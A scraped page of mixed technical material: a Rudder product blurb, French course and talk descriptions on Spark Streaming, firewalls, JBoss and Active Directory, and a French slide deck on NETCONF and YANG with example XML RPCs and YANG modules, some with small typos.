- Rudder works on almost every kind of device, so you’ll be managing physical and virtual servers in the data center, cloud instances, and embedded IoT devices in the same way.
- Rudder is designed for critical environments where a security breach can mean more than a blip in the sales stats. Built-in features include change requests, audit logs, and strong authentication.
- Rudder relies on an agent that needs to be installed on all hosts to audit. The agent is very lightweight (10 to 20 MB of RAM at peak) and blazingly fast (it’s written in C and takes less than 10 seconds to verify 100 rules). Installation is self-contained, via a single package, and can auto-update to limit agent management burden.
- Rudder is a true and professional open source solution—the team behind Rudder doesn’t believe in the dual-speed licensing approach that makes you reinstall everything and promotes open source as little more than a “demo version.”
Rudder is an established project with several 10000s of node managed, in companies from small to biggest-in-their-field. Typical deployments manage 100s to 1000s of nodes. The biggest known deployment in 2016 is about 7000 nodes.
Actuellement, on parle beaucoup de traitement en lots (batch) dans le monde du Big Data. Mais qu’en est-il du Streaming et du temps réel ? Beaucoup de frameworks Big Data tentent de répondre à cette problématique. En tête de liste figure Spark : grâce à son composant Spark Streaming, il permet un traitement en continu des flux de données et une disponibilité 24/7.
Au programme :
- Streaming et Architecture Big Data
- Hello world Spark Streaming
- Intégration de Flume à Spark Streaming
- Use case “métriques sur des logs applicatifs”
- Architecture physique : driver / workers / receivers
- Monitoring de Spark Streaming
- Fail over : reliable / unreliable sources, checkpoint, recover
- Tuning et performance.
Speakers :
- Nadhem LAMTI, Architecte Technique chez PALO IT
Depuis 10 ans, Nadhem intervient principalement sur des projets JAVA JEE de grande envergure dans différents secteurs (Télécommunication, Banque, Finance, Transports, Tourisme, etc.), développant ainsi une expertise polyvalente en abordant multiples technologies et architectures. Fort d’une expérience concluante en tant qu’Ingénieur Performance & Support, Nadhem est capable d’intervenir sur des problématiques de production liées à des systèmes d’informations complexes. Actuellement en mission chez Voyages SNCF, il contribue à un grand chantier Big Data de centralisation de logs et s’intéresse tout particulièrement au nouveau produit phare de traitement de données Apache Spark.
- Saâd-Eddine MALTI, Expert BDD chez Voyages SNCF
En poste depuis 10 ans chez Voyages SNCF, Saâd-Eddine intervient en tant qu’Expert BDD sur toutes les applications de manière transverse. L’orientation affichée de Voyages SNCF vers le Big Data pousse Saâd-Eddine à s’investir pleinement dans ce domaine, également sur le nouveau produit phare de traitement de données Apache Spark.
Au cours de cette formation, vous apprendrez à utiliser les technologies avancées de mise en réseau de de sécurité Fortigate.
Les rubriques incluent des fonctionnalités couramment utilisées dans les réseaux d’entreprise ou MSSP complexes ou plus grands, telle que le routage avancé, le mode transparent, l’infrastructure redondante, le VPN IPsec de site à site, la connexion unique, le proxy web et les diagnostics
Dans ce cours, vous apprendrez à faire du troubleshooting de la gamme complète de pare-feu de nouvelle génération de Palo Alto Networks. Vous développerez des connaissances approfondies sur la façon de diagnostiquer la visibilité et le contrôle des applications, des utilisateurs et du contenu. Dans un environnement pratique, vous dépannerez également des problèmes courants liés à la configuration et au fonctionnement des fonctionnalités de sécurité du système d'exploitation PAN-OS de Palo Alto Networks.
- Introduction à la mesure de performance
- Stress Test avant tuning
a. Cas de test
b. Dimensionnement (serveur)
c. Résultats
- Optimisation de JBoss EAP 5.1
a. Supprimer le non utilisé par votre application
b. Configuration de log4j
c. Configuration de la mémoire JVM
d. Configuration de la data sourcee.
- Configuration de la connexion HTTP
- Stress Test après tuning
Techdays 2009 - Active Directory Domain Services : bonnes pratiques et princi...fabricemeillon
Active Directory Domain Services est au cœur des fonctionnalités de sécurité, d’administration et d'interopérabilité de la plateforme Microsoft Windows Server. De nombreuses nouveautés sont apparues avec Windows Server 2008 : contrôleur de domaine en lecture seule, audit, politiques de mot de passe multiples, sauvegarde et restauration en mode cliché… Cette session permettra d'aborder les bonnes pratiques en ce qui concerne leurs implémentations et de présenter les nouveautés qui arriveront avec Windows Server 2008 R2. Une session à ne pas manquer pour assurer la réussite de vos migrations.
Les Servlets
Cycle de vie d'une Servlet
Traitement des données de formulaires
Gestion de l'état avec cookies et sessions
Introduction aux JSP
Les balises JSP personnalisées
Règles de conception
2. Motivations
Un protocole pour le management du réseau
Séparer entre un état de configuration et un état opérationnel
Assurer la persistance des configurations
Notifications, dump and restore
3. Configuration Management Protocol
SNMP
Largement utilisé, monitoring
Complexité de la gestion des configurations
NETCONF
XML-based encoding protocol
Mécanisme RPC
Sécurisé (SSH, SSL …)
Utilise un modèle pour structurer les données (YANG)
4. Configuration Management Protocol
Description SNMP NETCONF
Config vs operationnel state - +
Multiple Configs - +
Persistance of config state ° +
Configs change & Notification Events - +
Config dump & restore - +
Support of standard tools - +
5. NETCONF
Protocole en couches
Couches Exemple
Content
Operations
RPC
Transport Protocol
Configuration Data
<get-config>, <edit-
config>
<rpc>, <rpc-reply>
BEEP, SSH, SSL,
console
6. NETCONF Transport
Messages encodé en XML
Messages crypté en SSH
Netconf over SSH, SOAP, BEEP
Authentification, intégrité et confidentialité
Orienté connexion TCP
Plusieurs ports TCP sont définit : 830, 831, 832, 833, 6513 / tcp
<?xml version="1.0" encoding="UTF-8"?>
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<capabilities>
<capability>urn:ietf:params:netconf:base:1.0</capability>
</capabilities>
</hello>]]>]]>
7. NETCONF RPC Model
Les méthodes RPC sont insérées dans le corps d’un message XML
RPC Elements:
<rpc message-id="101"
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<some-method>
<!-- method parameters here... -->
</some-method>
</rpc>
<rpr-reply>
<rpc-reply message-id="101"
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0«
xmlns:ex="http://example.net/content/1.0" ex:user-id="fred">
<data>
<!-- contents here... -->
</data>
</rpc-reply>
<rpr-error>
<rpc-reply
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<rpc-error>
<error-type>rpc</error-type>
<error-tag>missing-attribute</error-tag>
<error-severity>error</error-severity>
<error-info>
<bad-attribute>message-id</bad-attribute>
<bad-element>rpc</bad-element>
</error-info>
</rpc-error>
</rpc-reply>
<ok Element>
<rpc-reply message-id="101"
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<ok/>
</rpc-reply>
8. NETCONF Configuration Data Store
Etats du système
Définit par des Capabilities
:running, :startup, :candidate, :writable-running
Informe sur les capacités supportées par la database
Startup
Running
Candidate
9. NETCONF Configuration Data Store
<running/>
Représente l’état active des configurations actuelles
Permet à cette base de donnée d’être directement modifée
Contient les informations sur l’état de l’équipement
<candidate/>
Regroupe les configurations à appliquer après qu’elle soient validé par le serveur
Les changements fait sur cette BDD ne s’applique pas immédiatement
Utilisation d’opérations: <lock>, <commit> pour validation
<Startup/>
Représente les Configs à appliquer lors du prochain redémarrage
Opération <copy-config> pour copier la dernière sauvegarde de config
10. NETCONF Base Operations
Opérations Description
get Récupérer les infos de configs à partir de la running database ou des
statistiques
get-config Récupérer les infos de configs à partir de la running database
edit-config Modifier les configurations dans la database
copy-config Copier les configurations
delete-config Supprimer les configurations
commit Commit du contenu de la config de <candidate/> ver <running/>
database
lock Bloquer l’écriture sur la database par d’autres sessions
unlock Débloquer l’écriture sur la database par d’autres sessions
validate Valider tout le contenu de la database
close-session Fermer la session active
kill-session Fermer d’autres sessions
11. NETCONF Base Operations
Before Editing: Quelle database utilisé ?
Options de sauvegarde
if ':candidate' capability supported:
target = <candidate/>
else if ':writable-running' capability supported:
target = <running/>
else if ':url' capability supported:
target = <url>file://path/to/file</url>
else:
target = None # Server is non-complaint
if ':startup' capability supported:
save_fn = <copy-config>
<target><startup/></target>
<source><running/></source>
</copy-config>
Else
save_fn = None # automatic NV-update
12. Candidate Configuration Example
<rpc message-id="101"
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<lock>
<target><running/></target>
</lock>
</rpc>
# server returns <ok/> status
<rpc message-id="102"
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<lock>
<target><candidate/></target>
</lock>
</rpc> # server returns <ok/> status
<rpc message-id="103"
xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config>
<target><candidate/></target>
<default-operation>none</default-operation>
<test-option>test-then-set</test-option>
<config>
<interface xmlns= " urn:ietf:params:xml:ns:yang:ietf-interfaces "
<name>eth1</name>
<ipv4-address>192.168.1.3</ipv4-address>
<macaddr>ab:cd:ef:gh:ij:kl</macaddr>
</config>
</edit-config>
</rpc> # server returns <ok/> status
#Commit then Unlock Candidate and Running DataBase
L’ensemble des RPC à exécuter:
1. lock <running/> database
2. lock <candidate/> database
3. edit <candidate/> database
4. commit <candidate/> database
5. unlock <candidate/> database
6. unlock <running/> database
NETCONF Base Operations
13. YANG
Langage pour la modélisation des données
Utilisé par NETCONF (couche content)
• Configuration data
• State data
Description hiérarchique des données
Interaction entre les modules et sous-modules
• Include
• import
Module 1
Submodule A
Module 2
Submodule ZSubmodule YSubmodule X
Include
import
14. Modules & Submodules
Header Information
Imports & Includes
Type definition
Config, operational data declaration
RPC, notification declaration
YANG Module Content
15. Data Modeling
Data nodes:
leaf, leaf-list, container, list
Yang data types :
Base types : Int8/16/32/64, uint8/6/32/64, string, enumeration, boolean …
Derived types (typedef), reusable nodes (grouping) …
container system {
list user {
key name;
leaf name {
type string;
}
leaf uid {
type uint32;
}
leaf full-name {
tyoe string;
}
leaf hostname{
type string;
mandatory true;
config true;
}
user
name uid full-name
hostname
system
16. YANG module example
module acme-system {
namespace "http://acme.example.com/system";
prefix "acme";
organization "ACME Inc.";
contact "joe@acme.example.com";
description
"The module for entities implementing the ACME system.";
revision 2007-11-05 {
description "Initial revision.";
}
container system {
leaf host-name {
type string;
description "Hostname for this system";
}
leaf-list domain-search {
type string;
description "List of domain names to search";
}
list interface {
key "name";
description "List of interfaces in the system";
leaf name {
type string;
}
leaf type {
type string;
}
leaf mtu {
type int32;
}
}
}
}